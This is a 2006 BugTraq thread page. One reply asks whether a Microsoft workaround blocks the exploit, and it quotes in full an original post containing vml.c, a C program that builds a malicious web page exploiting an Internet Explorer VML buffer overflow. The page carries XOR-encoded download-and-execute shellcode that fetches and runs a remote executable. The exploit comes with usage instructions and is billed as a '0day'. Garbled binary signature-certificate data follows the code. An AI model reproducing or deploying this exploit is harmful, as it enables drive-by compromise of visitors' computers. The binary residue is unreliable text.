BugTraq
vml.c - Internet Explorer VML Buffer Overflow Download Exec Exploit Sep 20 2006 06:03PM
nop (nop xsec org) (1 replies)
RE: vml.c - Internet Explorer VML Buffer Overflow Download Exec Exploit Sep 20 2006 08:01PM
Aras \Russ\ Memisyazici (arasm vt edu) (1 replies)
Does the Microsoft suggested workaround, using cacls to remove the
"Everyone" group from the dll thwart this particular exploit?

Aras "Russ" Memisyazici

Outreach Information Services
arasm (at) vt (dot) edu [email concealed]

Hanlon's Razor /prov./ A corollary of Finagle's Law, similar to Occam's
Razor, that reads "Never attribute to malice that which can be adequately
explained by stupidity."

-----Original Message-----
From: nop [mailto:nop (at) xsec (dot) org [email concealed]]
Sent: Wednesday, September 20, 2006 2:03 PM
To: bugtraq (at) securityfocus (dot) com [email concealed]
Subject: vml.c - Internet Explorer VML Buffer Overflow Download Exec Exploit

/*
*-----------------------------------------------------------------------

*
* vml.c - Internet Explorer VML Buffer Overflow Download Exec Exploit
* !!! 0day !!! Public Version !!!
*
* Copyright (C) 2006 XSec All Rights Reserved.
*
* Author : nop
* : nop#xsec.org
* : http://www.xsec.org
* :
* Tested : Windows 2000 Server CN
* : + Internet Explorer 6.0 SP1
* :
* Complie : cl vml.c
* :
* Usage : d:\>vml
* :
* : Usage: vml <URL> [htmlfile]
* :
* : d:\>vml http://xsec.org/xxx.exe xxx.htm
* :
*
*-----------------------------------------------------------------------
-
*/

#include <stdio.h>
#include <stdlib.h>
#include <windows.h>

FILE *fp = NULL;
char *file = "xsec.htm";
char *url = NULL;

#define NOPSIZE 260
#define MAXURL 60

//DWORD ret = 0x7Ffa4512; // call esp for CN
DWORD ret = 0x7800CCDD; // call esp for All win2k

// Search Shellcode
unsigned char dc[] =
"\x8B\xDC\xBE\x6F\x6F\x6F\x70\x4E\xBF\x6F\x30\x30\x70\x4F\x43\x39"
"\x3B\x75\xFB\x4B\x80\x33\xEE\x39\x73\xFC\x75\xF7\xFF\xD3";

// Shellcode Start
unsigned char dcstart[] =
"noop";

// Download Exec Shellcode XOR with 0xee
unsigned char sc[] =
"\x07\x4B\xEE\xEE\xEE\xB1\x8A\x4F\xDE\xEE\xEE\xEE\x65\xAE\xE2\x65"
"\x9E\xF2\x43\x65\x86\xE6\x65\x19\x84\xEA\xB7\x06\xAB\xEE\xEE\xEE"
"\x0C\x17\x86\x81\x80\xEE\xEE\x86\x9B\x9C\x82\x83\xBA\x11\xF8\x7B"
"\x06\xDE\xEE\xEE\xEE\x6D\x02\xCE\x65\x32\x84\xCE\xBD\x11\xB8\xEA"
"\x29\xEA\xED\xB2\x8F\xC0\x8B\x29\xAA\xED\xEA\x96\x8B\xEE\xEE\xDD"
"\x2E\xBE\xBE\xBD\xB9\xBE\x11\xB8\xFE\x65\x32\xBE\xBD\x11\xB8\xE6"
"\x84\xEF\x11\xB8\xE2\xBF\xB8\x65\x9B\xD2\x65\x9A\xC0\x96\xED\x1B"
"\xB8\x65\x98\xCE\xED\x1B\xDD\x27\xA7\xAF\x43\xED\x2B\xDD\x35\xE1"
"\x50\xFE\xD4\x38\x9A\xE6\x2F\x25\xE3\xED\x34\xAE\x05\x1F\xD5\xF1"
"\x9B\x09\xB0\x65\xB0\xCA\xED\x33\x88\x65\xE2\xA5\x65\xB0\xF2\xED"
"\x33\x65\xEA\x65\xED\x2B\x45\xB0\xB7\x2D\x06\xB8\x11\x11\x11\x60"
"\xA0\xE0\x02\x2F\x97\x0B\x56\x76\x10\x64\xE0\x90\x36\x0C\x9D\xD8"
"\xF4\xC1\x9E";

// Shellcode End
unsigned char dcend[] =
"n00p";

// HTML Header
char * header =
"<html xmlns:v=\"urn:schemas-microsoft-com:vml\">\n"
"<head>\n"
"<title>XSec.org</title>\n"
"<style>\n"
"v\\:* { behavior: url(#default#VML); }\n"
"</style>\n"
"</head>\n"
"<body>\n"
"<v:rect style=\"width:20pt;height:20pt\" fillcolor=\"red\">\n"
"<v:fill method=\"";

char * footer =
"\"/>\n"
"</v:rect>\n"
"</body>\n"
"</html>\n"
;

// convert string to NCR
void convert2ncr(unsigned char * buf, int size)
{
int i=0;
unsigned int ncr = 0;

for(i=0; i<size; i+=2)
{
ncr = (buf[i+1] << 8) + buf[i];

fprintf(fp, "&#%d;", ncr);
}
}

void main(int argc, char **argv)
{
unsigned char buf[1024] = {0};
unsigned char burl[255] = {0};
int sc_len = 0;
int psize = 0;
int i = 0;

unsigned int nop = 0x4141;
DWORD jmp = 0xeb06eb06;

if (argc < 2)
{
printf("Windows VML Download Exec Exploit\n");
printf("Code by nop nop#xsec.org, Welcome to http://www.xsec.org\n");
//printf("!!! 0Day !!! Please Keep Private!!!\n");
printf("\r\nUsage: %s <URL> [htmlfile]\r\n\n", argv[0]);
exit(1);
}

url = argv[1];
if( (!strstr(url, "http://") && !strstr(url, "ftp://")) || strlen(url) <
10 || strlen(url) > MAXURL)
{
printf("[-] Invalid url. Must start with 'http://','ftp://' and < %d
bytes.\n", MAXURL);
return;
}

printf("[+] download url:%s\n", url);

if(argc >=3) file = argv[2];

printf("[+] exploit file:%s\n", file);

fp = fopen(file, "w+b");
//fp = fopen(file, "w");
if(!fp)
{
printf("[-] Open file error!\n");
return;
}

// print html header
fprintf(fp, "%s", header);
fflush(fp);

for(i=0; i<NOPSIZE; i++)
{
//fprintf(fp, "&#%d;", nop);
fprintf(fp, "A");
}

fflush(fp);

// print shellcode
memset(buf, 0x90, sizeof(buf));
//memset(buf, 0x90, NOPSIZE*2);

memcpy(buf, &ret, 4);
psize = 4+8+0x10;

memcpy(buf+psize, dc, sizeof(dc)-1);
psize += sizeof(dc)-1;

memcpy(buf+psize, dcstart, 4);
psize += 4;

sc_len = sizeof(sc)-1;
memcpy(buf+psize, sc, sc_len);
psize += sc_len;

// print URL
memset(burl, 0, sizeof(burl));
strncpy(burl, url, 60);

for(i=0; i<strlen(url)+1; i++)
{
burl[i] = buf[i] ^ 0xee;
}

memcpy(buf+psize, burl, strlen(url)+1);
psize += strlen(url)+1;

memcpy(buf+psize, dcend, 4);
psize += 4;

// print NCR
convert2ncr(buf, psize);

printf("[+] buff size %d bytes\n", psize);

// print html footer
fprintf(fp, "%s", footer);
fflush(fp);

printf("[+] exploit write to %s success!\n", file);
}

0? *?H?÷
 ?0?1 0 +0? *?H?÷
 ?å0?m0?Ö Þήc& D7J2ucÔL0
 *?H?÷
0b1 0 UZA1%0#U
Thawte Consulting (Pty) Ltd.1,0*U#Thawte Personal Freemail Issuing CA0
060130140945Z
070130140945Z0]10U Memisyazici1
0 U*Aras10UAras Memisyazici10 *?H?÷
  arasm (at) vt (dot) edu0 [email concealed]?0
 *?H?÷
0?³ãΩ
Bÿ?3Ìj¤´?a?W$àßBé{æ¾£ïÚh/? Cñ? ô?m*?.çÓÈÏ?t?çØ?áݬBËWTÊÐBNx???$îܯ}+g:q®CÆ3ÕS?XFJü$kh?c4o?#g
[?-§»Ý?ËánãxË£)0'0U0 arasm (at) vt (dot) edu0 [email concealed] Uÿ00
 *?H?÷
7ZJ?.µl?7ô¼©??¤BÀYÐ?r8Í?F°ÑÛ?Ë»?îGP_8?EÎû4íô©2=»z¾fh?ï%Ï©
Ýø«ÍêDç
¢?,?!CYçz3?×è(ò*ÓL?_Ò?ÔK#$ÝËéÈDI~/?N?+?*?G???ÿ/µµ0?-0?? 
0
 *?H?÷
0Ñ1 0 UZA10U Western Cape10U Cape Town10U
Thawte Consulting1(0&U Certification Services Division1$0"UThawte Personal Freemail CA1+0) *?H?÷
 personal-freemail (at) thawte (dot) com0 [email concealed]
960101000000Z
201231235959Z0Ñ1 0 UZA10U Western Cape10U Cape Town10U
Thawte Consulting1(0&U Certification Services Division1$0"UThawte Personal Freemail CA1+0) *?H?÷
 personal-freemail (at) thawte (dot) com0 [email concealed]?0
 *?H?÷
0?Ôi×Ô°?d[qéGØ Q¶êr?°?^}-
{ß?%u(t:B,c'??{Kï~??ê£Ý¹Î?dÂnD¬|æèMq@8¦£?xöù??^­êÀ^vëÙ£]nz| ¥KU)??&Õj»8$j?DZڣ??ýyÛåZĹ£00Uÿ0ÿ0
 *?H?÷
Çì?~Nøõ?¥gb*¤ðM`Ðo`Xa¬&»R5\Ï0û¨J??bB#?ôºd?¬G)ߝ?^Òl`q\¢¬Üy
ãçnGµ
(èä?ýô¦Ù|±øÜ_#& ??sÐÞC©?%òæ?/Êþ¦«?u? ÝQ?käøÑÎw¢0??0?¨ 
0
 *?H?÷
0Ñ1 0 UZA10U Western Cape10U Cape Town10U
Thawte Consulting1(0&U Certification Services Division1$0"UThawte Personal Freemail CA1+0) *?H?÷
 personal-freemail (at) thawte (dot) com0 [email concealed]
030717000000Z
130716235959Z0b1 0 UZA1%0#U
Thawte Consulting (Pty) Ltd.1,0*U#Thawte Personal Freemail Issuing CA0?0
 *?H?÷
0?Ä¦<UsUûN¹Ê?ZhÀupßéÿ£ì½Íõ[òv½ :aò¿QÎÔåP
0×cZ,?p?ÝÉð+?Zª?qV˯< çñ?6$*Ï+Õó?w=¾+þ»>¿@?dק¦»?eÑÅ*T?H§¶Ñ<
a@dr`·û£?0?0Uÿ0ÿ0CU<0:08 6 4?2http://crl.tha
wte.com/ThawtePersonalFreemailCA.crl0 U0)U"0 ¤010UPrivateLabel2-1380
 *?H?÷
H?ÑP?ê .Ì
£f¬g¯¬¾Â¡C??L!¸ø6ª-?6/ÀôP ?p<ý­áabÃÙ:~?±?Å ?t?%P?bÇÛ'qW%Ý©?9?? Oe_?Ú÷÷?ÖÆN®öê4å[5MwãV!x?Ü!5Þ$±ÓFÿ]_eO1?ø0?ô0v0b1 0 UZA1%0#U
Thawte Consulting (Pty) Ltd.1,0*U#Thawte Personal Freemail Issuing CAÞήc& D7J2ucÔL0 + ?Ø0 *?H?÷
 1  *?H?÷
0 *?H?÷
 1
060920200107Z0# *?H?÷
 1Z¹½,?mumëå?6±?7×õè0g *?H?÷
 1Z0X0
*?H?÷
0*?H?÷
?0
*?H?÷
@0+0
*?H?÷
(0+0
*?H?÷
0? +?71x0v0b1 0 UZA1%0#U
Thawte Consulting (Pty) Ltd.1,0*U#Thawte Personal Freemail Issuing CAÞήc& D7J2ucÔL0? *?H?÷
  1x v0b1 0 UZA1%0#U
Thawte Consulting (Pty) Ltd.1,0*U#Thawte Personal Freemail Issuing CAÞήc& D7J2ucÔL0
 *?H?÷
?0@?Ä?´¾ªø?§þ»?}û¸t ØÛº²2Ñyx²
J60(D¿Ãs ?#¦a??¢å\3°-Ö
n+bó|^ÓG*)bØ7é
o \0XÙ?*Å9¨\$¸ì|¸±Í$ÆÕæ¾L¸?è3ý?µÈqC0¡±Ð!Â

[ reply ]
Re: vml.c - Internet Explorer VML Buffer Overflow Download Exec Exploit Sep 21 2006 09:53AM
Ben Hall (ben2004uk googlemail com)


 

Privacy Statement
Copyright 2010, SecurityFocus